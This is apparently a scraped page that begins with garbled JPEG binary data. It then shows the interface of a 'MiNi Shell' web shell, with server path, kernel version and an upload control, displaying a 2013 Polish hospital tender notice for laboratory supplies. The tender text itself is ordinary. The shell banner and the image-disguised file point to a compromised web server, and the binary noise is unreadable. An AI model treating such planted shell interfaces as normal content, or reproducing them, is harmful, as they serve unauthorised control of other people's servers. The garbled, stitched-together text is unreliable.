JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/504286-N-2013.html

<p class="kh_header"><b>Katowice: Dostawy odczynników oraz drobnego sprzętu laboratoryjnego</b><br>
<b>Numer ogłoszenia: 504286 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy odczynników oraz drobnego sprzętu laboratoryjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są sukcesywne dostawy odczynników oraz drobnego sprzętu laboratoryjnego. Zamawiający przedmiot zamówienia podzielił na 13 Pakietów:
Pakiet nr 1	-Drobny sprzęt laboratoryjny (1),
Pakiet nr 2	-Drobny sprzęt laboratoryjny (2),
Pakiet nr 3	-Drobny sprzęt laboratoryjny (3),
Pakiet nr 4	-Drobny sprzęt laboratoryjny (4),
Pakiet nr 5	-Odczynniki dla Pracowni Biochemii do dzierżawionego analizatora biochemicznego Beckman Coulter/AU680,
Pakiet nr 6	-Odczynniki  dla Pracowni Analityki Ogólnej,
Pakiet nr 7	- Odczynniki dla Pracowni Serologii,
Pakiet nr 8	-Odczynniki dla Pracowni Cytometrii do Cytometru BD FACSCALIBUR firmy Becton Dicinson,
Pakiet nr 9	-Odczynniki dla Pracowni Biochemii,
Pakiet nr 10	-Odczynniki dla Pracowni Cytogenetyki (1),
Pakiet nr 11	-Odczynniki dla Pracowni Cytogenetyki (2),
Pakiet nr 12	-Odczynniki dla Pracowni Wad Metabolicznych 
Pakiet nr 13	-Odczynniki dla Pracowni Biochemii do aparatu Mini Bos.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7, 38.43.70.00-7, 33.69.65.00-0, 22.10.00.00-1, 38.43.71.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie, że oferowany przedmiot zamówienia (podać numer pakietu) posiada wszystkie wymagane przepisami ustawy z dnia 20 maja 2010 r. o wyrobach medycznych /Dz. U z 2010 Nr 107 poz. 679/ dokumenty dopuszczające oferowany przedmiot zamówienia do obrotu i używania w zakładach opieki zdrowotnej zgodnie z ustawą i, że dokumenty będą udostępniane na każde wezwanie Zamawiającego. W przypadku zaoferowania wyrobów określonych przez Wytwórcę jako ogólno laboratoryjne Wykonawca zobowiązany jest złożyć stosowne oświadczenie. 2. Oświadczenie, że oferowane odczynniki posiadają karty charakterystyki substancji niebezpiecznych, i że będą one udostępnione na każde wezwanie Zamawiającego, a w przypadku wyrobów nie wymagających w/w kart stosowne oświadczenie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2). Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w punkcie 1. 3). W przypadku wspólnego ubiegania się o udzielenie zamówienia: a) wymóg posiadania uprawnień określonych w art. 22 ust 1 powinien spełniać ten Wykonawca, który będzie wykonywać część zamówienia objętego obowiązkiem posiadania uprawnień określonych w punkcie III.3.1. b) każdy z wykonawców ubiegających się wspólnie o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp (składając dokumenty i oświadczenia określone przez Zamawiającego w części III.4.2)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach: a) obniżenia ceny jednostkowej przez Wykonawcę, b) zmiany urzędowej stawki podatku VAT, c) zmiany konfekcjonowania przy założeniu, że cena proponowanego opakowania w przeliczeniu na ilości z oferty nie będzie wyższa niż dotychczasowa, d) zmiany terminu obowiązywania umowy w przypadku nie wykorzystania przez Zamawiającego w trakcie trwania umowy pełnej ilości dostarczanego przedmiotu umowy - przy zachowaniu dotychczasowej ceny, e) zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał dany towar z produkcji - przy cenie nie większej niż w umowie lub jeżeli Wykonawca nie może zaoferować w takim przypadku towaru innego producenta w cenie nie wyższej niż w umowie, rozwiązanie jej w zakresie dotyczącym tego towaru za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy, f) przedłużenia terminu płatności, g) zmiany stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych, h) zmiany numeru katalogowego przez producenta, i) w zakresie danych identyfikacyjnych strony umowy takich jak np. firma, adres osoby upoważnione do kontaktów/odbioru lub inne zapisy dotyczące wskazania Stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W wersji papierowej SIWZ można uzyskać w siedzibie Zamawiającego. Cena 10 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 11:30, miejsce: Siedziba Zamawiającego Kancelaria pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Drobny sprzęt laboratoryjny (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Korki plastikowe do probówek o śr 12 mm żeberkowe	, j.m. 	szt	ilość	5 000				, wielkość opakowania	op=1000szt
2.	Korki plastikowe do probówek o śr 15-16 mm, żeber.	, j.m. 	szt	ilość	5 000				, wielkość opakowania	op=1000szt
3.	Probówki Eppendorf 200 ?l z zatyczką	, j.m. 	op.	ilość	3				, wielkość opakowania	op=1000szt
4.	Probówki Ependorf 2 ml z zatyczka	, j.m. 	op.	ilość	1				, wielkość opakowania	op=500szt
5.	Końcówki do pipet automatycznych poj. 5 ml	, j.m. 	op.	ilość	6				, wielkość opakowania	op=250 szt
6.	Końcówki do pipet automatycznych niebieskie 	, j.m. 	op.	ilość	36				, wielkość opakowania	op=1000szt
7.	Końcówki do pipet automatycznych żółte	, j.m. 	op.	ilość	60				, wielkość opakowania	op=1000szt
8.	Mikrokokońcówki typu Gilson	, j.m. 	op.	ilość	1				, wielkość opakowania	op=1000szt
9.	Probówki Eppendorfa 1,5 ml.	, j.m. 	szt	ilość	30 000				, wielkość opakowania	op=500szt
10.	Szkiełka podstawowe grubości 1mm do rozmazów,szlifowane krawędzie pod kątem 45 stopni,ścięte rogi.	, j.m. 	szt	ilość	300				, wielkość opakowania	op=100szt
11.	Pipety Pasteura szklane o średnicy 7 mm, długości 150 mm.	, j.m. 	szt. 	ilość	500				, wielkość opakowania	op=250 szt
12.	Smoczki do pipet Pasteura.	, j.m. 	szt. 	ilość	250				, wielkość opakowania	op=50szt
13.	Szkiełka nakrywkowe 22mm x 22 mm.	, j.m. 	szt. 	ilość	24 000				, wielkość opakowania	 op=200 szt
14.	Szkiełka podstawowe o grubości 1 mm.	, j.m. 	szt. 	ilość	1 000				, wielkość opakowania	 Op=50 szt
15.	Szkiełka podstawowe z polem do opisu.	, j.m. 	szt. 	ilość	20 000				, wielkość opakowania	op=50 szt
16.	Szalki Petriego sterylne, aseptyczne, plastikowe o średnicy 60 mm.	, j.m. 	szt. 	ilość	1 000				, wielkość opakowania	op=500szt
17.	Szalki Petriego sterylne, aseptyczne, plastikowe o średnicy 90 mm.	, j.m. 	szt. 	ilość	3 000				, wielkość opakowania	op=500szt
18.	Kuwety do spektrofotometru Makro z tworzywa sztucznego o poj. 1-4 ml.	, j.m. 	szt. 	ilość	1 000				, wielkość opakowania	Op=100 szt
19.	Pojemniki na preparaty mikroskopowe 20,7 cm x 16,00 cm x 3 cm na 100 szt.   plastikowe	, j.m. 	szt. 	ilość	10					
20.	Pojemniki plastikowe na kał z łopatką.	, j.m. 	szt. 	ilość	4 000				, wielkość opakowania	Op=100 szt
21.	Probówki do wirowania moczu o pojemności 12 ml. ze stożkiem na 1 ml. osadu	, j.m. 	szt. 	ilość	10 000				, wielkość opakowania	Op=100 szt
22.	Wymazówki jednorazowe bez podłoża transportowego sterylne z plastikowym patyczkiem.	, j.m. 	szt. 	ilość	9 000				, wielkość opakowania	Op=100 szt
23.	Wymazówki jednorazowe z podłożem transportowym Amie, sterylne.	, j.m. 	szt. 	ilość	8 000				, wielkość opakowania	Op=150 szt
24.	Zakręcane pojemniki do moczu o poj. ok. 120 ml, plastikowe,	, j.m. 	szt. 	ilość	24 000				, wielkość opakowania	op=500 szt
25.	Zakręcane pojemniki na mocz, pakowane pojedyńczo o poj. 120 ml, sterylne, plastikowe	, j.m. 	szt. 	ilość	9 000				, wielkość opakowania	op=250 szt
26.	Płytki Petriego szklane o średnicy 60 mm.	, j.m. 	szt. 	ilość	200					
27.	Probówki serologiczne plastikowe o średnicy 12 mm, długości 7,5 cm.	, j.m. 	szt. 	ilość	50 000				, wielkość opakowania	op=1000szt
28.	Kapilary hematokrytowe o poj. 75 ml bez heparyny w fiolkach	, j.m. 	szt. 	ilość	3 000				, wielkość opakowania	op=1000szt
29.	Wymazówki z podłożem transportowym w kierunku bakterii beztlenowych, sterylne wykonane z tworzywa sztucznego, dł. całkowita 15 cm.	, j.m. 	szt. 	ilość	600				, wielkość opakowania	op=50 szt
30.	Probówki plastikowe stożkowe o objętości 10 ml., średn. 15 mm., dł.100 mm.	, j.m. 	szt. 	ilość	500				, wielkość opakowania	Op=100 szt
31.	Probówki  z polipropylenu o poj 10 ml  śr. 15 mm, okrągłodenne	, j.m. 	szt	ilość	3 500				, wielkość opakowania	op=1000szt
32.	Komora Thoma	, j.m. 	szt	ilość	1					
33.	Komora FUCHS-ROSENTAL	, j.m. 	szt	ilość	1					
34.	Zestaw do oznaczania płytek Thrombo Plus -probówki	, j.m. 	szt	ilość	50				, wielkość opakowania	op=50 szt
35.	Pudełko plastikowe do zamrażania 10 x 10 dołkówwysokość 5 cm	, j.m. 	szt	ilość	10					
36.	Zlewki szklane o poj. 800 ml	, j.m. 	szt.	ilość	2					
37.	Zlewki szklane o poj. 500 ml niskie	, j.m. 	szt.	ilość	5					
38.	Zlewki szklane o poj. 250 ml niskie	, j.m. 	szt.	ilość	10					
39.	Zlewki szklane o poj. 100 ml niskie	, j.m. 	szt.	ilość	5					
40.	Cylindry miarowe o poj. 25 ml	, j.m. 	szt.	ilość	10					
41.	Szkiełka nakrywkowe 24 mm x 50 mm	, j.m. 	op	ilość	5					
42.	Probówki szklane o śr. 12 mm, dł. 100 mm	, j.m. 	szt.	ilość	600					
43.	Cylindry miarowe poj. 250 ml. 	, j.m. 	szt. 	ilość	5					
44.	Cylindry miarowe poj. 50 ml. 	, j.m. 	szt. 	ilość	5					
45.	Probówki szklane okrągłodenne śr. 15-16 mm,  dł 10 cm	, j.m. 	szt	ilość	5 000				, wielkość opakowania	op=250 szt
46.	Barwiacze szklane Cotlina na 5 dołków	, j.m. 	szt.	ilość	5					
47.	Barwiacze plastikowe Cotlina na 10 dołków	, j.m. 	szt.	ilość	10					
48.	Bagietki szklane 4mm x 250 mm.	, j.m. 	op	ilość	1					
49.	Bagietki szklane 5mm x 250 mm.	, j.m. 	op	ilość	1					
50.	Etykiety samoprzylepne na probówki	, j.m. 	op	ilość	10				, wielkość opakowania	1 op = 1000 szt
51.	Folia parafilm w rolce 10cm na 75m	, j.m. 	szt. 	ilość	1					
52.	Pisaki laboratoryjne do szkła	, j.m. 	szt. 	ilość	60					
53.	Statyw z drutu powlekany na 20 probówek śr.12 mm	, j.m. 	szt	ilość	30					
54.	UROMETR 1000 - 1030	, j.m. 	szt	ilość	2					
55.	Probówki Eppendorfa 500 ul z zatyczką	, j.m. 	szt	ilość	3000					
56.	Cylinder miarowy 100 ml	, j.m. 	szt	ilość	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drobny sprzęt laboratoryjny (2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bibuła Whatman 1  75 x 100 mm	,	op=500 szt, ilość
	1
2.	Sączki bibułowe  średnio jakościowe śr. 9 cm, 	op=100 szt, ilość
		1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drobny sprzęt laboratoryjny (3).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Probówko-strzykawka do uzyskania surowicy z granulatem	,	Objętość 1-1,5 ml	, j.m.	szt	, ilość	22 000.
	Probówko-strzykawka do uzyskania surowicy z żelem	,	Objętość 2-3 ml	, j.m.	szt	, ilość	33 000.
	Probówko-strzykawka do uzyskania surowicy z granulatem	,	Objętość 4-6 ml	, j.m.	szt	, ilość	5 000
2. 	Probówko-strzykawka do uzyskania  osocza z cytrynianem sodu do oznaczeń koagulologicznych	,	Objętość 1-1,6 ml	, j.m.	szt	, ilość	12 000
3. 	Probówko-strzykawka do  oznaczeń hematologicznych z K3 EDTA	,	Objętość 1-1,5 ml	, j.m.	szt	, ilość	25 000
4. 	Probówko-strzykawka z  heparyną litową	,	Objętość 1-1,5 ml	, j.m.	szt	, ilość	1 000
5. 	Igła systemowa  0,7-0,9 mm	,		, j.m.	szt	, ilość	10 000
6. 	Igła motylkowa 0,6-0,9 mm	,		, j.m.	szt	, ilość	5 000
7. 	Adapter do posiewu krwi  igła motylkowa z adapterem do posiewu	,		, j.m.	szt	, ilość	3 600
